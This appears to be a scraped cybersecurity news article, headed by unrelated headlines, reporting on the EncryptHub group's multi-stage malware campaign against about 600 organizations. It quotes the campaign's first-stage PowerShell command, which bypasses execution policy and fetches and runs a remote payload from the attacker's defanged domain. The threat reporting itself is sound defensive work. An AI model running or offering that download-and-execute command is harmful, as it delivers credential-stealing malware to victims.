![[The AI Show Episode 142]: ChatGPT’s New Image Generator, Studio Ghibli Craze and Backlash, Gemini 2.5, OpenAI Academy, 4o Updates, Vibe Marketing & xAI Acquires X](https://www.marketingaiinstitute.com/hubfs/ep%20142%20cover.png)
![[DEALS] The Premium Learn to Code Certification Bundle (97% off) & Other Deals Up To 98% Off – Offers End Soon!](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
![From drop-out to software architect with Jason Lengstorf [Podcast #167]](https://cdn.hashnode.com/res/hashnode/image/upload/v1743796461357/f3d19cd7-e6f5-4d7c-8bfc-eb974bc8da68.png?#)
.png?#)
_Christophe_Coat_Alamy.jpg?#)
 (1).webp?#)
![Apple Considers Delaying Smart Home Hub Until 2026 [Gurman]](https://www.iclarified.com/images/news/96946/96946/96946-640.jpg)
![iPhone 17 Pro Won't Feature Two-Toned Back [Gurman]](https://www.iclarified.com/images/news/96944/96944/96944-640.jpg)
![Tariffs Threaten Apple's $999 iPhone Price Point in the U.S. [Gurman]](https://www.iclarified.com/images/news/96943/96943/96943-640.jpg)
EncryptHub A Multi-Stage Malware Compromised 600 Organizations
A sophisticated cybercriminal group known as EncryptHub has successfully compromised approximately 600 organizations through a multi-stage malware campaign. The threat actor exploited operational security mistakes, inadvertently exposing critical elements of their infrastructure, which allowed researchers to map their tactics with unprecedented depth. EncryptHub’s campaign employs several layers of PowerShell scripts to gather system data, exfiltrate […] The post EncryptHub A Multi-Stage Malware Compromised 600 Organizations appeared first on Cyber Security News.
A sophisticated cybercriminal group known as EncryptHub has successfully compromised approximately 600 organizations through a multi-stage malware campaign.
The threat actor exploited operational security mistakes, inadvertently exposing critical elements of their infrastructure, which allowed researchers to map their tactics with unprecedented depth.
EncryptHub’s campaign employs several layers of PowerShell scripts to gather system data, exfiltrate valuable information, execute evasion techniques, and deploy information stealers.
The threat actor has been observed targeting users of popular applications by distributing trojanized versions of software such as QQ Talk, WeChat, Microsoft Visual Studio 2022, and Palo Alto Global Protect.
These fake applications were generated between November 25th, 2024, and January 1st, 2025.
These applications were signed with code-signing certificates to appear legitimate, including one registered to “HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY” which has since been revoked.
As of February 4th, 2025, the group began using a new certificate registered to “Encrypthub LLC,” further demonstrating their evolving tactics.
.webp)
The attackers have also leveraged third-party distribution channels, including a pay-per-install service called “LabInstalls” that operates via a Telegram bot, allowing them to expand their reach and automate the deployment of malicious payloads to unsuspecting victims.
Outpost24’s KrakenLabs researchers discovered that EncryptHub prioritizes credential logs stolen from victims based on cryptocurrency ownership, corporate network affiliation, and the presence of VPN software, indicating sophisticated targeting methods.
EncryptHub’s Evolving Kill Chain
The multi-stage attack begins with the execution of a PowerShell command that downloads the first-stage payload: “powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ‘hxxps://encrypthub[.]us/encrypthub/fickle/payload.ps1’/ InvokeExpression””.
This initial payload is responsible for stealing sensitive data including messaging sessions, crypto wallets, password manager files, and VPN sessions.
The second stage involves runner.ps1, which contains base64-encoded MSC files that are decoded, modified, and executed to embed malicious URLs.
The third stage employs an HTML loader that instructs Windows Defender to exclude the TEMP folder from scans and downloads additional scripts.
The final stage deploys Rhadamanthys malware, completing the infection chain.
.webp)
EncryptHub’s kill chain show the progression from initial execution through multiple stages to final payload deployment.
.webp)
The group is also developing “EncryptRAT,” a command-and-control panel that manages infections and sends remote commands, suggesting they may soon commercialize this tool to other threat actors.
.webp)
Organizations are advised to implement multi-layered security strategies and continuous monitoring to protect against this evolving threat.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
The post EncryptHub A Multi-Stage Malware Compromised 600 Organizations appeared first on Cyber Security News.
